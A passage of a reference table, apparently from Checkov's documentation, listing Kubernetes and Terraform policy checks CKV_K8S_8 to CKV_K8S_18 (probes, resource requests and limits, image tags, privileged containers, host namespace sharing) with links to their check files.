[LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2444 | CKV_K8S_8 | resource | PodTemplate | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2445 | CKV_K8S_8 | resource | ReplicaSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2446 | CKV_K8S_8 | resource | ReplicationController | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2447 | CKV_K8S_8 | resource | StatefulSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2448 | CKV_K8S_8 | resource | kubernetes_deployment | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 2449 | CKV_K8S_8 | resource | kubernetes_deployment_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 2450 | CKV_K8S_8 | resource | kubernetes_pod | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 2451 | CKV_K8S_8 | resource | kubernetes_pod_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 2452 | CKV_K8S_9 | resource | DaemonSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2453 | CKV_K8S_9 | resource | Deployment | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2454 | CKV_K8S_9 | resource | DeploymentConfig | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2455 | CKV_K8S_9 | resource | Pod | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2456 | CKV_K8S_9 | resource | PodTemplate | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2457 | CKV_K8S_9 | resource | ReplicaSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2458 | CKV_K8S_9 | resource | ReplicationController | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2459 | CKV_K8S_9 | resource | StatefulSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2460 | CKV_K8S_9 | resource | kubernetes_deployment | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 2461 | CKV_K8S_9 | resource | kubernetes_deployment_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 2462 | CKV_K8S_9 | resource | kubernetes_pod | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 2463 | CKV_K8S_9 | resource | kubernetes_pod_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 2464 | CKV_K8S_10 | resource | CronJob | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2465 | CKV_K8S_10 | resource | DaemonSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2466 | CKV_K8S_10 | resource | Deployment | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2467 | CKV_K8S_10 | resource | DeploymentConfig | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2468 | CKV_K8S_10 | resource | Job | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2469 | CKV_K8S_10 | resource | Pod | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2470 | CKV_K8S_10 | resource | PodTemplate | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2471 | CKV_K8S_10 | resource | ReplicaSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2472 | CKV_K8S_10 | resource | ReplicationController | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2473 | CKV_K8S_10 | resource | StatefulSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2474 | CKV_K8S_10 | resource | kubernetes_deployment | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 2475 | CKV_K8S_10 | resource | kubernetes_deployment_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 2476 | CKV_K8S_10 | resource | kubernetes_pod | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 2477 | CKV_K8S_10 | resource | kubernetes_pod_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 2478 | CKV_K8S_11 | resource | CronJob | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2479 | CKV_K8S_11 | resource | DaemonSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2480 | CKV_K8S_11 | resource | Deployment | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2481 | CKV_K8S_11 | resource | DeploymentConfig | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2482 | CKV_K8S_11 | resource | Job | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2483 | CKV_K8S_11 | resource | Pod | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2484 | CKV_K8S_11 | resource | PodTemplate | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2485 | CKV_K8S_11 | resource | ReplicaSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2486 | CKV_K8S_11 | resource | ReplicationController | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2487 | CKV_K8S_11 | resource | StatefulSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2488 | CKV_K8S_11 | resource | kubernetes_deployment | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 2489 | CKV_K8S_11 | resource | kubernetes_deployment_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 2490 | CKV_K8S_11 | resource | kubernetes_pod | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 2491 | CKV_K8S_11 | resource | kubernetes_pod_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 2492 | CKV_K8S_12 | resource | CronJob | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2493 | CKV_K8S_12 | resource | DaemonSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2494 | CKV_K8S_12 | resource | Deployment | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2495 | CKV_K8S_12 | resource | DeploymentConfig | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2496 | CKV_K8S_12 | resource | Job | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2497 | CKV_K8S_12 | resource | Pod | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2498 | CKV_K8S_12 | resource | PodTemplate | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2499 | CKV_K8S_12 | resource | ReplicaSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2500 | CKV_K8S_12 | resource | ReplicationController | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2501 | CKV_K8S_12 | resource | StatefulSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2502 | CKV_K8S_12 | resource | kubernetes_deployment | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 2503 | CKV_K8S_12 | resource | kubernetes_deployment_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 2504 | CKV_K8S_12 | resource | kubernetes_pod | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 2505 | CKV_K8S_12 | resource | kubernetes_pod_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 2506 | CKV_K8S_13 | resource | CronJob | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2507 | CKV_K8S_13 | resource | DaemonSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2508 | CKV_K8S_13 | resource | Deployment | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2509 | CKV_K8S_13 | resource | DeploymentConfig | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2510 | CKV_K8S_13 | resource | Job | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2511 | CKV_K8S_13 | resource | Pod | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2512 | CKV_K8S_13 | resource | PodTemplate | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2513 | CKV_K8S_13 | resource | ReplicaSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2514 | CKV_K8S_13 | resource | ReplicationController | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2515 | CKV_K8S_13 | resource | StatefulSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2516 | CKV_K8S_13 | resource | kubernetes_deployment | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 2517 | CKV_K8S_13 | resource | kubernetes_deployment_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 2518 | CKV_K8S_13 | resource | kubernetes_pod | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 2519 | CKV_K8S_13 | resource | kubernetes_pod_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 2520 | CKV_K8S_14 | resource | CronJob | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2521 | CKV_K8S_14 | resource | DaemonSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2522 | CKV_K8S_14 | resource | Deployment | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2523 | CKV_K8S_14 | resource | DeploymentConfig | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2524 | CKV_K8S_14 | resource | Job | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2525 | CKV_K8S_14 | resource | Pod | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2526 | CKV_K8S_14 | resource | PodTemplate | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2527 | CKV_K8S_14 | resource | ReplicaSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2528 | CKV_K8S_14 | resource | ReplicationController | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2529 | CKV_K8S_14 | resource | StatefulSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2530 | CKV_K8S_14 | resource | kubernetes_deployment | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 2531 | CKV_K8S_14 | resource | kubernetes_deployment_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 2532 | CKV_K8S_14 | resource | kubernetes_pod | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 2533 | CKV_K8S_14 | resource | kubernetes_pod_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 2534 | CKV_K8S_15 | resource | CronJob | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2535 | CKV_K8S_15 | resource | DaemonSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2536 | CKV_K8S_15 | resource | Deployment | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2537 | CKV_K8S_15 | resource | DeploymentConfig | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2538 | CKV_K8S_15 | resource | Job | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2539 | CKV_K8S_15 | resource | Pod | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2540 | CKV_K8S_15 | resource | PodTemplate | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2541 | CKV_K8S_15 | resource | ReplicaSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2542 | CKV_K8S_15 | resource | ReplicationController | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2543 | CKV_K8S_15 | resource | StatefulSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2544 | CKV_K8S_15 | resource | kubernetes_deployment | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 2545 | CKV_K8S_15 | resource | kubernetes_deployment_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 2546 | CKV_K8S_15 | resource | kubernetes_pod | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 2547 | CKV_K8S_15 | resource | kubernetes_pod_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 2548 | CKV_K8S_16 | resource | CronJob | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2549 | CKV_K8S_16 | resource | DaemonSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2550 | CKV_K8S_16 | resource | Deployment | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2551 | CKV_K8S_16 | resource | DeploymentConfig | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2552 | CKV_K8S_16 | resource | Job | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2553 | CKV_K8S_16 | resource | Pod | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2554 | CKV_K8S_16 | resource | PodTemplate | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2555 | CKV_K8S_16 | resource | ReplicaSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2556 | CKV_K8S_16 | resource | ReplicationController | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2557 | CKV_K8S_16 | resource | StatefulSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2558 | CKV_K8S_16 | resource | kubernetes_deployment | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 2559 | CKV_K8S_16 | resource | kubernetes_deployment_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 2560 | CKV_K8S_16 | resource | kubernetes_pod | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 2561 | CKV_K8S_16 | resource | kubernetes_pod_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 2562 | CKV_K8S_17 | resource | CronJob | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2563 | CKV_K8S_17 | resource | DaemonSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2564 | CKV_K8S_17 | resource | Deployment | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2565 | CKV_K8S_17 | resource | Job | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2566 | CKV_K8S_17 | resource | Pod | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2567 | CKV_K8S_17 | resource | ReplicaSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2568 | CKV_K8S_17 | resource | ReplicationController | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2569 | CKV_K8S_17 | resource | StatefulSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2570 | CKV_K8S_17 | resource | kubernetes_deployment | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 2571 | CKV_K8S_17 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 2572 | CKV_K8S_17 | resource | kubernetes_pod | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 2573 | CKV_K8S_17 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 2574 | CKV_K8S_18 | resource | CronJob | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2575 | CKV_K8S_18 | resource | DaemonSet | Containers should not share the host IPC namespace | Kubernetes | 